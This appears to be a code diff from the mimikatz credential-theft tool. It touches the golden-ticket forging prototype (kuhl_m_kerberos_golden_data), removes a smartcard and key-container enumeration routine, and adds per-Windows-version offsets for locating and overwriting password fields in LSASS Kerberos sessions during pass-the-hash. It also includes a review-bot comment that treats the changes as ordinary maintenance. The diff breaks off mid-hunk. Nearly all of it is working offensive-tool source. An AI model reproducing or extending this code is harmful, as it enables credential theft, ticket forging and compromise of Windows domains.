PBERVAL kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, LPCWSTR servicename, LPCWSTR targetname, PKUHL_M_KERBEROS_LIFETIME_DATA lifetime, LPCBYTE key, DWORD keySize, DWORD keyType, PISID sid, LPCWSTR LogonDomainName, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups, PKERB_SID_AND_ATTRIBUTES sids, DWORD cbSids, DWORD rodc, PCLAIMS_SET pClaimsSet);
|
||||
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt);
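Review bot: The reordered prototype of kuhl_m_kerberos_golden_data moves `LPCWSTR LogonDomainName` from the 3rd position to the 10th and `PISID sid` from the 7th to the 9th, and because the 3rd slot is now `LPCWSTR servicename` the compiler cannot flag a caller that was left on the old order — it would silently pass the NetBIOS domain as the service name. The one caller visible in this commit (kuhl_m_kerberos.c) is updated; any other consumer of this header is not shown here, so that should be confirmed. A short comment above the declaration would make the argument grouping readable at the call site, along the lines of `// identity (username, domainname), ticket target (servicename, targetname), lifetime, ticket key (key, keySize, keyType), then PAC content (sid, LogonDomainName, userid, groups, sids, rodc, claims); sid == NULL builds a ticket without a PAC`, the last clause following the `if(sid) // we want a PAC !` test introduced in kuhl_m_kerberos.c.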
|
@ -5,7 +5,7 @@
|
||||
*/
|
||||
#include "kuhl_m_kerberos_ccache.h"
|
||||
|
||||
const UNICODE_STRING usXCACHECONF = {24, 26, L"X-CACHECONF:"};
|
||||
DECLARE_CONST_UNICODE_STRING(usXCACHECONF, L"X-CACHECONF:");
|
||||
NTSTATUS kuhl_m_kerberos_ccache_enum(int argc, wchar_t * argv[], BOOL isInject, BOOL isSave)
|
||||
{
|
||||
PBYTE file, data;
|
||||
|
@ -631,310 +631,6 @@ wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wchar_t *
|
||||
return buffer;
|
||||
}
|
||||
|
||||
DWORD kuhl_m_crypto_l_sc_provtypefromname(LPCWSTR szProvider)
|
||||
{
|
||||
DWORD result = 0, provType, tailleRequise, index = 0;
|
||||
wchar_t * monProvider;
|
||||
for(index = 0, result = 0; !result && CryptEnumProviders(index, NULL, 0, &provType, NULL, &tailleRequise); index++)
|
||||
{
|
||||
if(monProvider = (wchar_t *) LocalAlloc(LPTR, tailleRequise))
|
||||
{
|
||||
if(CryptEnumProviders(index, NULL, 0, &provType, monProvider, &tailleRequise))
|
||||
if(_wcsicmp(szProvider, monProvider) == 0)
|
||||
result = provType;
|
||||
LocalFree(monProvider);
|
||||
}
|
||||
}
|
||||
if(!result && GetLastError() != ERROR_NO_MORE_ITEMS)
|
||||
PRINT_ERROR_AUTO(L"CryptEnumProviders");
|
||||
return provType;
|
||||
}
|
||||
|
||||
PWSTR kuhl_m_crypto_l_sc_containerFromReader(LPCWSTR reader)
|
||||
{
|
||||
PWSTR result = NULL;
|
||||
DWORD szReader = (DWORD) wcslen(reader);
|
||||
if(result = (PWSTR) LocalAlloc(LPTR, (szReader + 6) * sizeof(wchar_t)))
|
||||
{
|
||||
RtlCopyMemory(result, L"\\\\.\\", 4 * sizeof(wchar_t));
|
||||
RtlCopyMemory(result + 4, reader, szReader * sizeof(wchar_t));
|
||||
RtlCopyMemory(result + 4 + szReader, L"\\", 1 * sizeof(wchar_t));
|
||||
}
|
||||
return result;
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_crypto_l_sc(int argc, wchar_t * argv[])
|
||||
{
|
||||
SCARDCONTEXT hContext;
|
||||
SCARDHANDLE hCard;
|
||||
PBYTE atr;
|
||||
LONG status;
|
||||
LPWSTR mszReaders = NULL, pReader, mszCards = NULL, pCard, szProvider = NULL, szContainer;
|
||||
DWORD dwLen = SCARD_AUTOALLOCATE, dwAtrLen;
|
||||
|
||||
status = SCardEstablishContext(SCARD_SCOPE_SYSTEM, NULL, NULL, &hContext);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
status = SCardListReaders(hContext, SCARD_ALL_READERS, (LPWSTR) &mszReaders, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L"SmartCard readers:");
|
||||
for(pReader = mszReaders; *pReader; pReader += wcslen(pReader) + 1)
|
||||
{
|
||||
kprintf(L"\n * %s\n", pReader);
|
||||
if(szContainer = kuhl_m_crypto_l_sc_containerFromReader(pReader))
|
||||
{
|
||||
status = SCardConnect(hContext, pReader, SCARD_SHARE_SHARED, SCARD_PROTOCOL_T0 | SCARD_PROTOCOL_T1, &hCard, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
dwAtrLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetAttrib(hCard, SCARD_ATTR_ATR_STRING, (PBYTE) &atr, &dwAtrLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" ATR : ");
|
||||
kull_m_string_wprintf_hex(atr, dwAtrLen, 0);
|
||||
kprintf(L"\n");
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardListCards(hContext, atr, NULL, 0, (LPWSTR) &mszCards, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
for(pCard = mszCards; pCard && *pCard; pCard += wcslen(pCard) + 1)
|
||||
{
|
||||
kprintf(L" Model: %s\n", pCard);
|
||||
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetCardTypeProviderName(hContext, pCard, SCARD_PROVIDER_PRIMARY, (LPWSTR) &szProvider, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" PRIM : %s\n", szProvider);
|
||||
SCardFreeMemory(hContext, szProvider);
|
||||
}
|
||||
else if(status != ERROR_FILE_NOT_FOUND) PRINT_ERROR(L"SCardGetCardTypeProviderName(PRIM): 0x%08x\n", status);
|
||||
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetCardTypeProviderName(hContext, pCard, SCARD_PROVIDER_CSP, (LPWSTR) &szProvider, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" CSP : %s\n", szProvider);
|
||||
if(dwLen = kuhl_m_crypto_l_sc_provtypefromname(szProvider))
|
||||
kuhl_m_crypto_l_keys_capi(szContainer, szProvider, dwLen, CRYPT_SILENT, FALSE, NULL);
|
||||
SCardFreeMemory(hContext, szProvider);
|
||||
}
|
||||
else if(status != ERROR_FILE_NOT_FOUND) PRINT_ERROR(L"SCardGetCardTypeProviderName(CSP): 0x%08x\n", status);
|
||||
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetCardTypeProviderName(hContext, pCard, SCARD_PROVIDER_KSP, (LPWSTR) &szProvider, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" KSP : %s\n", szProvider);
|
||||
kuhl_m_crypto_l_keys_cng(szContainer, szProvider, 0, FALSE, NULL);
|
||||
SCardFreeMemory(hContext, szProvider);
|
||||
}
|
||||
else if(status != ERROR_FILE_NOT_FOUND) PRINT_ERROR(L"SCardGetCardTypeProviderName(KSP): 0x%08x\n", status);
|
||||
|
||||
dwLen = SCARD_AUTOALLOCATE;
|
||||
status = SCardGetCardTypeProviderName(hContext, pCard, SCARD_PROVIDER_CARD_MODULE, (LPWSTR) &szProvider, &dwLen);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" MDRV : %s\n", szProvider);
|
||||
kuhl_m_crypto_l_mdr(szProvider, hContext, hCard, pCard, atr, dwAtrLen);
|
||||
SCardFreeMemory(hContext, szProvider);
|
||||
}
|
||||
else if(status != ERROR_FILE_NOT_FOUND) PRINT_ERROR(L"SCardGetCardTypeProviderName(MDR): 0x%08x\n", status);
|
||||
}
|
||||
SCardFreeMemory(hContext, mszCards);
|
||||
}
|
||||
else PRINT_ERROR(L"SCardListCards: 0x%08x\n", status);
|
||||
SCardFreeMemory(hContext, atr);
|
||||
}
|
||||
else PRINT_ERROR(L"SCardGetAttrib: 0x%08x (%u)\n", status, dwAtrLen);
|
||||
SCardDisconnect(hCard, SCARD_LEAVE_CARD);
|
||||
}
|
||||
else if(status != SCARD_W_REMOVED_CARD)
|
||||
PRINT_ERROR(L"SCardConnect: 0x%08x\n", status);
|
||||
LocalFree(szContainer);
|
||||
}
|
||||
}
|
||||
SCardFreeMemory(hContext, mszReaders);
|
||||
}
|
||||
else PRINT_ERROR(L"SCardListReaders: 0x%08x\n", status);
|
||||
SCardReleaseContext(hContext);
|
||||
}
|
||||
else PRINT_ERROR(L"SCardEstablishContext: 0x%08x\n", status);
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
LPVOID WINAPI mdAlloc(__in SIZE_T Size)
|
||||
{
|
||||
return malloc(Size);
|
||||
}
|
||||
|
||||
LPVOID WINAPI mdReAlloc( __in LPVOID Address, __in SIZE_T Size)
|
||||
{
|
||||
return realloc(Address, Size);
|
||||
}
|
||||
|
||||
void WINAPI mdFree( __in LPVOID Address)
|
||||
{
|
||||
if(Address)
|
||||
free(Address);
|
||||
}
|
||||
|
||||
DWORD WINAPI mdCacheAddFile(__in PVOID pvCacheContext, __in LPWSTR wszTag, __in DWORD dwFlags, __in_bcount(cbData) PBYTE pbData, __in DWORD cbData)
|
||||
{
|
||||
kprintf(TEXT(__FUNCTION__) L"\n");
|
||||
return SCARD_E_INVALID_PARAMETER;
|
||||
}
|
||||
|
||||
DWORD WINAPI mdCacheLookupFile(__in PVOID pvCacheContext, __in LPWSTR wszTag, __in DWORD dwFlags, __deref_out_bcount(*pcbData) PBYTE *ppbData, __out PDWORD pcbData)
|
||||
{
|
||||
kprintf(TEXT(__FUNCTION__) L"\n");
|
||||
return SCARD_E_INVALID_PARAMETER;
|
||||
}
|
||||
|
||||
DWORD WINAPI mdCacheDeleteFile(__in PVOID pvCacheContext, __in LPWSTR wszTag, __in DWORD dwFlags)
|
||||
{
|
||||
kprintf(TEXT(__FUNCTION__) L"\n");
|
||||
return SCARD_E_INVALID_PARAMETER;
|
||||
}
|
||||
|
||||
DWORD WINAPI mdPadData(__in PCARD_SIGNING_INFO pSigningInfo, __in DWORD cbMaxWidth, __out DWORD* pcbPaddedBuffer, __deref_out_bcount(*pcbPaddedBuffer) PBYTE* ppbPaddedBuffer)
|
||||
{
|
||||
kprintf(TEXT(__FUNCTION__) L"\n");
|
||||
return SCARD_E_INVALID_PARAMETER;
|
||||
}
|
||||
|
||||
void enuma(PCARD_DATA pData, LPCSTR dir)
|
||||
{
|
||||
LPSTR files = NULL, p;
|
||||
DWORD status, nFiles = 0;
|
||||
|
||||
kprintf(L" \\%-8S: ", dir ? dir : "<root>");
|
||||
status = pData->pfnCardEnumFiles(pData, (LPSTR) dir, &files, &nFiles, 0);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
for(p = files; *p; p += lstrlenA(p) + 1)
|
||||
kprintf(L"%S ; ", p);
|
||||
kprintf(L"\n");
|
||||
pData->pfnCspFree(files);
|
||||
}
|
||||
else if(status == SCARD_E_FILE_NOT_FOUND)
|
||||
kprintf(L"<empty>\n");
|
||||
else PRINT_ERROR(L"CardEnumFiles: 0x%08x\n", status);
|
||||
}
|
||||
|
||||
void descblob(PUBLICKEYSTRUC *pk)
|
||||
{
|
||||
kprintf(L"%s", kull_m_crypto_algid_to_name(pk->aiKeyAlg));
|
||||
switch(pk->aiKeyAlg)
|
||||
{
|
||||
case CALG_RSA_KEYX:
|
||||
case CALG_RSA_SIGN:
|
||||
kprintf(L" (%u)", ((PRSA_GENERICKEY_BLOB) pk)->RsaKey.bitlen);
|
||||
break;
|
||||
default:
|
||||
;
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_crypto_l_mdr(LPCWSTR szMdr, SCARDCONTEXT ctxScard, SCARDHANDLE hScard, LPCWSTR szModel, LPCBYTE pbAtr, DWORD cbAtr)
|
||||
{
|
||||
HMODULE hModule;
|
||||
CARD_DATA cd = {0};
|
||||
PFN_CARD_ACQUIRE_CONTEXT CardAcquireContext;
|
||||
//CARD_CAPABILITIES cap = {CARD_CAPABILITIES_CURRENT_VERSION, FALSE, FALSE};
|
||||
CARD_FREE_SPACE_INFO spa = {CARD_FREE_SPACE_INFO_CURRENT_VERSION, 0, 0, 0};
|
||||
CONTAINER_INFO ci;
|
||||
DWORD status, i;
|
||||
|
||||
if(hModule = LoadLibrary(szMdr))
|
||||
{
|
||||
if(CardAcquireContext = (PFN_CARD_ACQUIRE_CONTEXT) GetProcAddress(hModule, "CardAcquireContext"))
|
||||
{
|
||||
cd.dwVersion = CARD_DATA_CURRENT_VERSION; // 7
|
||||
cd.pbAtr = (PBYTE) pbAtr;
|
||||
cd.cbAtr = cbAtr;
|
||||
cd.pwszCardName = (LPWSTR) szModel;
|
||||
|
||||
cd.pfnCspAlloc = mdAlloc;
|
||||
cd.pfnCspReAlloc = mdReAlloc;
|
||||
cd.pfnCspFree = mdFree;
|
||||
cd.pfnCspCacheAddFile = mdCacheAddFile;
|
||||
cd.pfnCspCacheLookupFile = mdCacheLookupFile;
|
||||
cd.pfnCspCacheDeleteFile = mdCacheDeleteFile;
|
||||
cd.pfnCspPadData = mdPadData;
|
||||
|
||||
cd.hSCardCtx = ctxScard;
|
||||
cd.hScard = hScard;
|
||||
|
||||
cd.pfnCspGetDHAgreement = NULL;
|
||||
cd.pfnCspUnpadData = NULL;
|
||||
|
||||
|
||||
status = CardAcquireContext(&cd, 0);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
//status = cd.pfnCardQueryCapabilities(&cd, &cap);
|
||||
//if(status == SCARD_S_SUCCESS)
|
||||
// kprintf(L" CertificateCompression: %08x\n KeyGen: %08x\n", cap.fCertificateCompression, cap.fKeyGen);
|
||||
//else PRINT_ERROR(L"CardQueryCapabilities: 0x%08x\n", status);
|
||||
|
||||
status = cd.pfnCardQueryFreeSpace(&cd, 0, &spa);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L" Containers: %u / %u (%u byte(s) free)\n", spa.dwKeyContainersAvailable, spa.dwMaxKeyContainers, spa.dwBytesAvailable);
|
||||
|
||||
for(i = 0; i < spa.dwMaxKeyContainers; i++)
|
||||
{
|
||||
ci.dwVersion = CONTAINER_INFO_CURRENT_VERSION;
|
||||
status = cd.pfnCardGetContainerInfo(&cd, (BYTE) i, 0, &ci);
|
||||
if(status == SCARD_S_SUCCESS)
|
||||
{
|
||||
kprintf(L"\t[%2u] ", i);
|
||||
if(ci.cbSigPublicKey && ci.pbSigPublicKey)
|
||||
{
|
||||
kprintf(L"Signature: ");
|
||||
descblob((PUBLICKEYSTRUC *) ci.pbSigPublicKey);
|
||||
cd.pfnCspFree(ci.pbSigPublicKey);
|
||||
|
||||
if(ci.cbKeyExPublicKey && ci.pbKeyExPublicKey)
|
||||
kprintf(L" - ");
|
||||
}
|
||||
if(ci.cbKeyExPublicKey && ci.pbKeyExPublicKey)
|
||||
{
|
||||
kprintf(L"Exchange: ");
|
||||
descblob((PUBLICKEYSTRUC *) ci.pbKeyExPublicKey);
|
||||
cd.pfnCspFree(ci.pbKeyExPublicKey);
|
||||
}
|
||||
kprintf(L"\n");
|
||||
}
|
||||
else if(status != SCARD_E_NO_KEY_CONTAINER) PRINT_ERROR(L"CardGetContainerInfo(%u): 0x%08x\n", i, status);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"CardQueryFreeSpace: 0x%08x\n", status);
|
||||
|
||||
enuma(&cd, NULL);
|
||||
enuma(&cd, "mscp");
|
||||
enuma(&cd, "mimikatz");
|
||||
|
||||
|
||||
|
||||
status = cd.pfnCardDeleteContext(&cd);
|
||||
if(status != SCARD_S_SUCCESS)
|
||||
PRINT_ERROR(L"CardDeleteContext: 0x%08x\n", status);
|
||||
}
|
||||
else PRINT_ERROR(L"CardAcquireContext: 0x%08x\n", status);
|
||||
|
||||
}
|
||||
else PRINT_ERROR(L"No CardAcquireContext export in \'%s\'\n", szMdr);
|
||||
FreeLibrary(hModule);
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"LoadLibrary");
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_crypto_hash(int argc, wchar_t * argv[])
|
||||
{
|
||||
PCWCHAR szCount, szPassword = NULL, szUsername = NULL;
|
||||
@ -1072,7 +768,7 @@ BOOL CALLBACK kuhl_m_crypto_system_directory(DWORD level, PCWCHAR fullpath, PCWC
|
||||
LocalFree(fileData);
|
||||
}
|
||||
}
|
||||
return TRUE;
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[])
|
||||
@ -1087,8 +783,7 @@ NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[])
|
||||
kprintf(L"* Directory: \'%s\'\n", infile);
|
||||
kull_m_file_Find(infile, NULL, FALSE, 0, FALSE, kuhl_m_crypto_system_directory, &isExport);
|
||||
}
|
||||
else
|
||||
kuhl_m_crypto_system_directory(0, infile, PathFindFileName(infile), &isExport);
|
||||
else kuhl_m_crypto_system_directory(0, infile, PathFindFileName(infile), &isExport);
|
||||
}
|
||||
else PRINT_ERROR(L"Input Microsoft Crypto Certificate file needed (/file:filename|directory)\n");
|
||||
return STATUS_SUCCESS;
|
||||
|
@ -5,11 +5,11 @@
|
||||
*/
|
||||
#pragma once
|
||||
#include "kuhl_m.h"
|
||||
#include <cardmod.h>
|
||||
#include "../modules/kull_m_crypto.h"
|
||||
#include "../modules/kull_m_string.h"
|
||||
#include "../modules/kull_m_file.h"
|
||||
#include "../modules/kull_m_registry.h"
|
||||
#include "crypto/kuhl_m_crypto_sc.h"
|
||||
#include "crypto/kuhl_m_crypto_extractor.h"
|
||||
#include "crypto/kuhl_m_crypto_patch.h"
|
||||
|
||||
@ -49,7 +49,6 @@ NTSTATUS kuhl_m_crypto_l_providers(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_l_stores(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_l_certificates(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_l_keys(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_l_sc(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_hash(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_system(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_crypto_c_sc_auth(int argc, wchar_t * argv[]);
|
||||
@ -65,6 +64,3 @@ wchar_t * kuhl_m_crypto_generateFileName(const wchar_t * term0, const wchar_t *
|
||||
void kuhl_m_crypto_file_rawData(PKUHL_M_CRYPTO_CERT_PROP prop, PCWCHAR inFile, BOOL isExport);
|
||||
void kuhl_m_crypto_l_keys_capi(LPCWSTR szContainer, LPCWSTR szProvider, DWORD dwProvType, DWORD dwFlags, BOOL export, LPCWSTR szStore);
|
||||
void kuhl_m_crypto_l_keys_cng(LPCWSTR szContainer, LPCWSTR szProvider, DWORD dwFlags, BOOL export, LPCWSTR szStore);
|
||||
void kuhl_m_crypto_l_mdr(LPCWSTR szMdr, SCARDCONTEXT ctxScard, SCARDHANDLE hScard, LPCWSTR szModel, LPCBYTE pbAtr, DWORD cbAtr);
|
||||
DWORD kuhl_m_crypto_l_sc_provtypefromname(LPCWSTR szProvider);
|
||||
PWSTR kuhl_m_crypto_l_sc_containerFromReader(LPCWSTR reader);
|
@ -72,6 +72,8 @@ const KERB_INFOS kerbHelper[] = {
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_51, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
|
||||
},
|
||||
{
|
||||
sizeof(LIST_ENTRY) + FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -106,7 +108,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_5),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO_5, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_5, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -141,7 +145,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -176,7 +182,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_60, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -211,7 +219,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_62, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, credentials) + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password),
|
||||
sizeof(KIWI_GENERIC_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
@ -246,7 +256,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
|
||||
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, LocallyUniqueIdentifier),
|
||||
@ -281,7 +293,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0),
|
||||
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL, unk0)
|
||||
},
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, LocallyUniqueIdentifier),
|
||||
@ -316,7 +330,9 @@ const KERB_INFOS kerbHelper[] = {
|
||||
sizeof(KERB_HASHPASSWORD_6_1607),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspDataLength),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData) + FIELD_OFFSET(KERB_SMARTCARD_CSP_INFO, nCardNameOffset),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData)
|
||||
FIELD_OFFSET(KIWI_KERBEROS_CSP_INFOS_10, CspData),
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, credentials) + FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction),
|
||||
sizeof(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607) - FIELD_OFFSET(KIWI_KERBEROS_10_PRIMARY_CREDENTIAL_1607, unkFunction)
|
||||
},
|
||||
};
|
||||
|
||||
@ -444,7 +460,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
||||
BYTE ntlmHash[LM_NTLM_HASH_LENGTH], aes128key[AES_128_KEY_LENGTH], aes256key[AES_256_KEY_LENGTH];
|
||||
BOOL isNtlm = FALSE, isAes128 = FALSE, isAes256 = FALSE;
|
||||
UNICODE_STRING nullPasswd = {0, 0, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {NULL, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetCreds + FIELD_OFFSET(KIWI_GENERIC_PRIMARY_CREDENTIAL, Password), RemoteLocalKerbSession.hMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLocalKeyMemory = {NULL, Localkerbsession.hMemory}, aLocalHashMemory = {NULL, Localkerbsession.hMemory}, aLocalNTLMMemory = {NULL, Localkerbsession.hMemory}, aLocalPasswdMemory = {&nullPasswd, Localkerbsession.hMemory}, aRemotePasswdMemory = {(PBYTE) RemoteLocalKerbSession.address + kerbHelper[KerbOffsetIndex].offsetPasswordErase, RemoteLocalKerbSession.hMemory};
|
||||
PKERB_HASHPASSWORD_GENERIC pHash;
|
||||
PBYTE baseCheck;
|
||||
PCWCHAR resultok;
|
||||
@ -526,12 +542,16 @@ void CALLBACK kuhl_m_sekurlsa_enum_kerberos_callback_pth(IN PKIWI_BASIC_SECURITY
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
|
||||
